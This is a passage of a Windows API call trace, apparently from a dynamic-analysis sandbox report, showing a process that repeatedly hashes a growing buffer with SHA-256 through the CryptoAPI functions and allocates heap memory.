	[0201.825] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9b78
	[0201.825] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9b78, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9b78, pdwDataLen=0x129424) returned 1
	[0201.825] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.825] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.825] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.826] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.826] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0201.826] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.826] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9ba0
	[0201.826] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9ba0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9ba0, pdwDataLen=0x129424) returned 1
	[0201.826] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.826] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.826] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.826] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.826] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0201.826] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.826] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9bc8
	[0201.826] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9bc8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9bc8, pdwDataLen=0x129424) returned 1
	[0201.826] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.827] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.827] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.827] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.827] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0201.827] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.827] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9bf0
	[0201.827] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9bf0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9bf0, pdwDataLen=0x129424) returned 1
	[0201.827] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.827] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.827] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.827] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.827] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0201.827] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.827] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9c18
	[0201.827] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9c18, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9c18, pdwDataLen=0x129424) returned 1
	[0201.827] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.828] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.828] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.828] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.828] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0201.828] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9c40
	[0201.828] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9c40, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9c40, pdwDataLen=0x129424) returned 1
	[0201.828] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.828] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.828] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.828] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.828] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0201.828] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9c68
	[0201.828] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9c68, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9c68, pdwDataLen=0x129424) returned 1
	[0201.828] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.828] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.829] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.829] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.829] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0201.829] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9c90
	[0201.829] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9c90, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9c90, pdwDataLen=0x129424) returned 1
	[0201.829] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.829] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.829] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.829] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.829] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0201.829] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9cb8
	[0201.829] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9cb8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9cb8, pdwDataLen=0x129424) returned 1
	[0201.829] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.830] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.830] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.830] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.830] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0201.830] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9ce0
	[0201.830] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9ce0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9ce0, pdwDataLen=0x129424) returned 1
	[0201.830] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.830] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.830] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.830] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.830] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0201.830] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9d08
	[0201.830] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9d08, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9d08, pdwDataLen=0x129424) returned 1
	[0201.830] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.830] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.831] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.831] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.831] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0201.831] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9d30
	[0201.831] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9d30, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9d30, pdwDataLen=0x129424) returned 1
	[0201.831] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.831] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.831] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.831] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.831] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0201.831] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9d58
	[0201.831] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9d58, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9d58, pdwDataLen=0x129424) returned 1
	[0201.831] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.831] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.832] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.832] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.832] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0201.832] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.832] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9d80
	[0201.832] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9d80, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9d80, pdwDataLen=0x129424) returned 1
	[0201.832] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.832] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.832] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.832] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.832] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0201.832] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.832] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9da8
	[0201.832] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9da8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9da8, pdwDataLen=0x129424) returned 1
	[0201.832] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.832] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.832] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.833] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.833] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0201.833] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.833] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9dd0
	[0201.833] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9dd0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9dd0, pdwDataLen=0x129424) returned 1
	[0201.833] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.833] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.833] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.834] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.834] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0201.834] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9df8
	[0201.834] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9df8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9df8, pdwDataLen=0x129424) returned 1
	[0201.834] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.834] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.834] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.834] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.834] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0201.834] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9e20
	[0201.834] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9e20, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9e20, pdwDataLen=0x129424) returned 1
	[0201.834] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.834] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.834] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.835] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.835] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0201.835] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9e48
	[0201.835] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9e48, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9e48, pdwDataLen=0x129424) returned 1
	[0201.835] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.835] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.835] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.835] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.835] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0201.835] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9e70
	[0201.835] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9e70, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9e70, pdwDataLen=0x129424) returned 1
	[0201.835] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.835] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.835] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.836] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.836] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0201.836] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9e98
	[0201.836] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9e98, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9e98, pdwDataLen=0x129424) returned 1
	[0201.836] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.836] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.836] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.836] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.836] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0201.836] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9ec0
	[0201.836] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9ec0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9ec0, pdwDataLen=0x129424) returned 1
	[0201.836] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.836] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.836] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.837] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.837] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0201.837] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.837] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9ee8
	[0201.837] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9ee8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9ee8, pdwDataLen=0x129424) returned 1
	[0201.837] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.837] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.837] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.837] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.837] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0201.837] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.837] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9f10
	[0201.837] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9f10, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9f10, pdwDataLen=0x129424) returned 1
	[0201.837] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.837] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.837] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.838] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.838] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0201.838] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.838] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9f38
	[0201.838] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9f38, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9f38, pdwDataLen=0x129424) returned 1
	[0201.838] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.838] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.838] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.838] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.838] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0201.838] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.838] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9f60
	[0201.838] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9f60, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9f60, pdwDataLen=0x129424) returned 1
	[0201.838] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.838] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.838] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
